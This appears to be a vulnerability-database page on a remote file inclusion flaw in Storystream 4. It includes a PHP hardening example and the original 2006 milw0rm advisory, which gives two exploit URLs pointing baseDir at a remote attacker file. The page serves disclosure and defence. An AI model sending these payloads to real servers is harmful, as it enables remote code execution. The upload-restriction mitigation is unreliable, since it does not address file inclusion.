Vendor: Storystream
Discovered by: v1per-haCker
CVSS: 9.3 (HIGH)
Vulnerability type: Remote File Inclusion (RFI)
CWE: 98
Product Name: Storystream
Affected Version From: 4
Affected Version To: 4
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

How I Can lives Without FooL Programmer!

Storystream is vulnerable to Remote File Inclusion (RFI). The vulnerable scripts are include/classes/pear/DB/mysql.php and include/classes/pear/DB/mysqli.php, which accept a baseDir parameter in the HTTP request. An attacker who sends a specially crafted request with a remote URL in baseDir causes the server to include a file from that attacker-controlled location, and so can execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate an RFI vulnerability is to restrict the file types that can be uploaded to the server. The application should also validate user input and filter out any malicious code.
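The include pattern described above for mysql.php and mysqli.php, beside the input-validation mitigation, as an added PHP example that is not Storystream's code and is not taken from the advisory below. The vulnerable shape is reconstructed as an assumption from the exploit URLs (an include path built from a request-controlled baseDir); STORYSTREAM_LIB_DIR, resolve_driver_file and the driver parameter are hypothetical names introduced for the example.

```php
<?php
// Added example, not Storystream's code. Shows the assumed vulnerable include
// shape from this page's description next to a hardened replacement.
//
// Assumed vulnerable shape of include/classes/pear/DB/mysql.php (reconstructed
// from the exploit URLs, not copied from the product): the include path is built
// from $baseDir, which the request controls (register_globals or $_GET). With
// allow_url_include on, a URL in ?baseDir= is fetched and executed as PHP:
//
//     include_once $baseDir . '/DB/common.php';
//
// Hardened version: never build an include path from request data. The library
// root is fixed by the application; any name that still has to come from input
// is checked against an allowlist and then resolved with realpath() so that it
// must land inside that root (rejects URLs, traversal and symlink escapes).

define('STORYSTREAM_LIB_DIR', realpath(__DIR__ . '/..'));   // assumption: fixed library root

/**
 * Map a driver name to a file inside the fixed library directory.
 * Returns the absolute path, or null when the name is not on the allowlist
 * or the resolved path is outside STORYSTREAM_LIB_DIR.
 */
function resolve_driver_file(string $driver): ?string
{
    static $allowed = ['mysql', 'mysqli', 'common'];   // allowlist of known driver files
    if (!in_array($driver, $allowed, true)) {
        return null;
    }
    $path = realpath(STORYSTREAM_LIB_DIR . '/DB/' . $driver . '.php');
    // realpath() returns false for a missing file; the prefix check catches
    // anything that resolved outside the library root.
    if ($path === false || strpos($path, STORYSTREAM_LIB_DIR . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$driver = $_GET['driver'] ?? 'mysql';   // still untrusted input, but no longer a path
$file = resolve_driver_file($driver);
if ($file === null) {
    http_response_code(400);
    exit('unknown database driver');
}
require_once $file;
```

Two server settings close the remote-fetch half of the bug independently of the code: allow_url_include=Off in php.ini (the default since PHP 5.2) stops include and require from fetching http:// or ftp:// URLs, and register_globals=Off (the option was removed in PHP 5.4) stops a request parameter from silently becoming a variable such as $baseDir. Neither replaces the allowlist, because the same include with a local filesystem path in baseDir would still read arbitrary local files.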
Source

Exploit-DB raw data:

#########################################################################################
################################### v1per-haCker
########################################
###################### How I Can lives Without FooL Programmer!
#########################
#########################################################################################
#=======================================================================================#
#___________________________________Storystream (RFI)___________________________________#
#=======================================================================================#
# Information:-                                                                         #
#                                                                                       #
# Scripts: Storystream                                                                  #
# download :    http://www.iwonderdesigns.com/downloads/storystream_beta_0.4.0.0.zip    #
# Version : 4                                                                           #
# Dork & vuln : download script and think :)                                            #
#                                                                                       #
#=======================================================================================#
# Exploit :                                                                             #
#                                                                                       #
#http://localhost/path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt?   #
#http://localhost/path/include/classes/pear/DB/mysqli.php?baseDir=http://EvElCoDe.txt?  #
#                                                                                       #
#=======================================================================================#
# Discovered By : v1per-haCker                                                          #
#                                                                                       #
# Contact : v1per-hacker[at]hotmail.com                                                 #
#                                                                                       #
# XP10_hackEr Team              >>      www.xp10.com                                    #
# SpeciaL PoweR SecuritY TeaM   >>      www.specialpower.org                            #
#                                                                                       #
# Greetz to :   | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL  |		#
#               | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB |           #
#               | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota   |           #
#               | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO  |           #
#               |  MuhaciR  |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi |           #
#                                                                                       #
# Thanks >>     /str0ke & www.milw0rm.com & www.google.com                              #
#=======================================================================================#
#########################################################################################
################################# L0ve is L1fe W0und3r
##################################
#########################################################################################

# milw0rm.com [2006-11-12]